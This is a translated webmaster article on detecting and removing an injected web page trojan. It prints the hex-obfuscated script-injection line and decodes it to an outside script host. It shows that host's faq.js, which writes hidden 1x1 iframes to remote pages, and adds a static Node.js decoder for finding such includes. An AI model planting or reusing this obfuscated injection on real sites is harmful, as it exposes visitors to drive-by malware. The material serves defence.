三原色 reference article: How to detect and remove web page trojans (network security)
Trojan code sample:
“<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>”
The latest trojans are hex-encoded.
Replace \x with %, then decode the result with an HTML code conversion tool:
<script src=http://O%66%66%49%63e%2E%46%41Q%53%65%72v.%43%6F%4D/%46%41%51%2E%6A%73></script>
Convert it once more to decode it.
What the JS finally outputs is:
<script src=http://OffIce.FAQServ.CoM/FAQ.js></script>
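The two decoding passes above can be reproduced without ever running the script. The following Node.js code is an added example, not part of the original article: it peels the \xNN and %NN layers as plain text and reports script sources that only become visible after decoding. The function names are this example's own, and the sample input is constructed with the placeholder host example.test.

```javascript
// Added example: static decoder for the two encoding layers described above.
// Nothing is evaluated; the script text is only rewritten.

// Constructed sample: one ordinary script tag plus an injected line built the
// same way as the article's (\xNN escapes wrapping %NN); example.test is a placeholder.
const SAMPLE = String.raw`<script src="/js/site.js"></script>
<script>document.writeln("\x3Cscript src=http://ex\x2561mple.test/\x2561.js\x3E\x3C/script\x3E");</script>`;

const fromHex = (_, hex) => String.fromCharCode(parseInt(hex, 16));

// Layer 1: JavaScript string escapes (\xNN).
const decodeHexEscapes = (text) => text.replace(/\\x([0-9a-fA-F]{2})/g, fromHex);

// Layer 2: percent-encoding (%NN). A regex is used instead of
// decodeURIComponent so malformed sequences are left alone rather than throwing.
const decodePercent = (text) => text.replace(/%([0-9a-fA-F]{2})/g, fromHex);

// Apply one decoder per pass until nothing changes; keep every stage.
function peelLayers(text, maxPasses = 6) {
  const stages = [text];
  for (let i = 0; i < maxPasses; i++) {
    const prev = stages[stages.length - 1];
    let next = decodeHexEscapes(prev);
    if (next === prev) next = decodePercent(prev);
    if (next === prev) break;
    stages.push(next);
  }
  return stages;
}

// Script sources that appear only after decoding, i.e. hidden in the raw file.
function hiddenScriptSources(fileText) {
  const srcRe = /<script[^>]*\ssrc\s*=\s*["']?([^"'\s>]+)/gi;
  const sources = (text) => [...text.matchAll(srcRe)].map((m) => m[1]);
  const visible = new Set(sources(fileText));
  const decoded = peelLayers(fileText).pop();
  return sources(decoded).filter((url) => !visible.has(url));
}

console.log(hiddenScriptSources(SAMPLE));
```

Run over each file of a site, a non-empty result marks a file whose raw text hides a script include that the page's own visible tags do not account for.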
faq.js contains:
document.write('<iframe src="https://www.59.vc/page/add_54738542.htm" width="1" height="1" frameborder="1"></iframe>');
document.write('<iframe src="https://OffIce.FAQServ.com/FAQ.htm" width="1" height="2" frameborder="0"></iframe>');
https://OffIce.FAQServ.com/FAQ.htm
Downloading it reveals this code: <script language="javascript" src="https://count18.51yes.com/click.aspxid=189404354&logo=1"></script>
One of the trojan's addresses belongs to 51yes.
https://www.59.vc/page/add_54738542.htm"
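Downloading it reveals this code: <script src=addr.js></script><script language="javascript" type="text/javascript" src="https://js.users.51.la/1542776.js"></script>
To keep readers from getting infected, http has been changed to https.
Temporary fix for removing the trojan:
Download 文本替换专家 (a text replacement tool): http://sccrc.onlinedown.net/down/wfReplace26.rar
Replace this code in the website's files: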
<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>
with an empty string: select the website path, run the replacement, then re-upload the files.
This article comes from: 站长网 (www.admin5.com). Original source: http://www.admin5.com/article/20080318/76524.shtml

